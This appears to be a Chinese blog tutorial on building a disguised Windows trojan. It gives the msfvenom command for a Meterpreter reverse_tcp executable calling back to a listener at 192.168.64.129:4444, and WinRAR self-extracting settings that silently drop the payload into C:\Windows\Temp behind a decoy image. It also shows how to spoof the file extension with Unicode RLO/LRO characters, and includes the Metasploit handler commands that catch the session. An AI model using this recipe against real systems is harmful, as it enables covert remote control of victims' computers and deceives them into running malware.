kali-WinRaR高级配置

本文详细描述了在Windows环境下使用msfvenom生成Meterpreter反弹shell的exe文件,通过WinRAR创建自解压格式,利用Unicode字符进行文件名隐藏,并成功触发Meterpreter监听的过程。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

操作环境

kali
windows

一、下载WinRaR

http://www.winrar.com.cn/

二、准备工作

msfvenom  -p windows/meterpreter/reverse_tcp  LHOST=192.168.64.129 LPORT=4444 -f exe -o YouGuess.exe
┌──(root㉿kali)-[~]
└─# msfvenom  -p windows/meterpreter/reverse_tcp  LHOST=192.168.64.129 LPORT=4444 -f exe -o YouGuess.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 354 bytes
Final size of exe file: 73802 bytes
Saved as: YouGuess.exe

#下载生成文件到本地
┌──(root㉿kali)-[~]
└─# sz YouGuess.exe

AI生成一张图片,扣图为透明图像。 http://www.ico51.cn/

在这里插入图片描述

选中YouGuess.jpg图像和YouGuess.exe,右键,使用WinRaR,添加到压缩文件

在这里插入图片描述

  1. 常规中勾选创建自解压格式压缩文件

  2. 高级中点击自解压选项,常规中选择解压路径,填写

    C:\Windows\Temp

    自动选择绝对路径;设置中解压后运行,填写

    C:\Windows\Temp\YouGuess.jpg

    C:\Windows\Temp\YouGuess.jpg

  3. 模式中选择全部隐藏

  4. 更新中选择解压并更新文件,跳过已经存在的文件

  5. 文本和图标中选择从文件加载自解压文件图标

在这里插入图片描述

效果图

在这里插入图片描述

三、文件名处理

改个名吧,选中文件名进行重命名,重命名框出现后,鼠标右键插入 Unicode 控制字符 RLO

RLO 从右到左

LRO 从左到右

输入gpj结果是什么呢

在这里插入图片描述

再次重命名,这次插入LRO

在这里插入图片描述

回到Kali开启监听一下

┌──(root㉿kali)-[/home/kali/output]
└─# msfdb run
msf6 > use exploit/multi/handler
msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set lhost 192.168.64.129
msf6 exploit(multi/handler) > set lport 4444 
msf6 exploit(multi/handler) > run
[*] Started reverse TCP handler on 192.168.64.129:4444 

OK,打开一下这个文件

在这里插入图片描述

四、开始监听

确实打开了图片,并且解压到了Temp目录下,Kali也监听到了目标机

在这里插入图片描述

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

睡不着乌托托

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值